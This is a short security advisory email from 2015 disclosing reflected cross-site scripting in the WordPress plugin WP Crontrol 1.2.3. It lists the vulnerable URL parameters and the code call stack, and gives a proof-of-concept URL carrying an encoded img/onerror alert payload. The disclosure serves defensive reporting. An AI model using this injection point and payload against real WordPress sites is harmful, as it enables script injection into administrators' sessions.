Subject: Cross-Site Scripting (XSS) in WP Crontrol 1.2.3

Date: Fri, 21 Aug 2015 12:19:42 +0200

Hello,

Plugin: WP Crontrol 1.2.3 https://wordpress.org/plugins/wp-crontrol/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can store html/js code (there is no CSRF protection).

Method: GET

Url: http://localhost/wp-admin/tools.php?page=crontrol_admin_manage_page&action=edit-cron&id%5Bhookname%5D=[xss]

Vulnerable parameters: id[hookname], id[sig], id[next_run], id[args][code]

Example PHP callstack:

Crontrol::admin_manage_page [/wp-crontrol/wp-crontrol.php:668]

Crontrol::show_cron_form [/wp-crontrol/wp-crontrol.php:501]

Verification:

http://localhost/wp-admin/tools.php?page=crontrol_admin_manage_page&action=edit-cron&id%5Bhookname%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--

Regards,
Marcin Probola,